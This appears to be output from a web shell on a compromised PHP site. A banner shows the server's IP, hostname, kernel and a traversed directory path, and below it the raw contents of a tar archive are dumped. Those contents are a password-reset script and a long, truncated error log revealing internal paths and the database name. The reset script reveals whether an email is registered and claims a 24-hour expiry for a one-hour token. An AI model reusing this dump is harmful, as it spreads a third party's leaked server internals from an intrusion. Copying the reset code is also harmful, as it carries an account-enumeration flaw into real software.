uawdijnntqw1x1x1
IP : 216.73.216.110
Hostname : 6.87.74.97.host.secureserver.net
Kernel : Linux 6.87.74.97.host.secureserver.net 4.18.0-553.83.1.el8_10.x86_64 #1 SMP Mon Nov 10 04:22:44 EST 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
emeraadmin
/
.caldav
/
..
/
.
/
public_html
/
src
/
..
/
node_modules
/
..
/
4d695
/
pages.tar
/
/
send_reset_link.php000064400000003556151676701240010447 0ustar00<?php //load .env file require_once '../vendor/autoload.php'; $dotenv = Dotenv\Dotenv::createImmutable(__DIR__ . '/../'); $dotenv->load(); //set base url $base_url = $_ENV['BASE_URL']; require_once 'emailUtils.php'; require_once '../Classes/Database.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $email = $_POST['email']; $db = new Database(); // Check if email exists in the database $db->query('SELECT id, email FROM users WHERE email = :email'); $db->bind(':email', $email); $user = $db->single(); if ($user) { // Generate unique token $token = bin2hex(random_bytes(50)); $expiry = date("Y-m-d H:i:s", strtotime('+1 hour')); // Save token and expiry in the database $db->query('INSERT INTO password_resets (user_id, token, expires_at) VALUES (:user_id, :token, :expires_at)'); $db->bind(':user_id', $user->id); $db->bind(':token', $token); $db->bind(':expires_at', $expiry); $db->execute(); // Prepare email details $resetLink = $base_url."/pages/reset-password.php?token=" . $token; $template = 'email_templates/password_reset_template.html'; $placeholders = [ "Recipient's Name" => $user->email, 'Reset Password Link' => $resetLink, 'expiration time, e.g., 24 hours' => '24 hours', 'Your Name' => 'Your Name', 'Your Position' => 'Your Position', 'Your Company' => 'Your Company', 'Your Contact Information' => 'Your Contact Information' ]; // Call the sendEmail function $result = sendEmail($email, 'Reset Your Password', '', true, $template, $placeholders); echo $result; } else { echo "Email not found"; } } else { echo "Invalid request"; } ?> error_log000064400001753130151676701240006504 0ustar00[29-Jun-2024 04:40:01 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:08 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:10 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:12 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:32 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:56 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:40:57 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:41:01 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:44:16 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:44:39 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:45:18 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:46:56 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:47:58 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:48:10 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'emeradb.users' doesn't exist in /home/ftmgc76wdee4/public_html/Classes/Database.php:78 Stack trace: #0 /home/ftmgc76wdee4/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/ftmgc76wdee4/public_html/Classes/Database.php(91): Database->execute() #2 /home/ftmgc76wdee4/public_html/Service/UserService.php(19): Database->single() #3 /home/ftmgc76wdee4/public_html/pages/authenticateuser.php(12): UserService->login() #4 {main} thrown in /home/ftmgc76wdee4/public_html/Classes/Database.php on line 78 [29-Jun-2024 04:50:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:55:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:56:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:56:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:57:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 04:58:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 06:13:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 06:25:49 UTC] PHP Fatal error: Uncaught Error: Undefined constant PHPMailer\PHPMailer\PHPMailer::DEBUG_SERVER in /home/ftmgc76wdee4/public_html/pages/emailUtils.php:26 Stack trace: #0 /home/ftmgc76wdee4/public_html/pages/send_reset_link.php(51): sendEmail() #1 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emailUtils.php on line 26 [29-Jun-2024 06:44:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 06:48:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 07:08:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 08:31:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 09:37:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 09:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:13:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:14:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:19:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:22:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:23:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:23:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:24:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:25:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:29:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 10:31:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 11:37:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 13:10:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 13:37:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 13:56:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [29-Jun-2024 14:00:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 02:34:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 02:58:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 03:13:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 03:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 07:57:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 10:02:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 10:45:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 10:45:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 11:20:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 14:29:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 22:15:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 22:24:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [30-Jun-2024 22:28:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:00:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:37:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:42:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:51:05 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:51:05 UTC] PHP Fatal error: Uncaught Error: Call to a member function getTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:54:42 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:54:42 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:07 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:07 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:08 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:08 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:10 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:10 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:11 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:11 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:15 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:15 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:16 UTC] PHP Warning: Undefined variable $now in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:16 UTC] PHP Fatal error: Uncaught Error: Call to a member function setTimezone() on null in /home/ftmgc76wdee4/public_html/pages/taskform.php:176 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 176 [01-Jul-2024 00:55:28 UTC] PHP Fatal error: Uncaught Error: Object of class DateTimeZone could not be converted to string in /home/ftmgc76wdee4/public_html/pages/taskform.php:178 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 178 [01-Jul-2024 00:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 00:58:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 01:29:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 02:05:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 03:07:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 04:00:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 04:19:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 04:35:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:02:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:03:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:04:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:08:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:09:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:10:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:11:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:21:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:22:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:32:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:32:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:36:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:36:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:37:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:44:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:46:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:47:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:47:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:49:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:51:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:53:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 05:58:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 08:21:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 12:31:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [01-Jul-2024 23:24:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:19:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:19:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:37:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 00:57:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 01:32:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:02:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:03:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:21:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 02:50:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:03:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:04:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:45:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:47:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:52:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:53:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 03:55:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 04:05:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 04:07:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 04:08:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 05:03:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 06:02:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 06:27:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 07:04:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 07:19:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 09:56:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 10:43:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Jul-2024 10:48:03 UTC] PHP 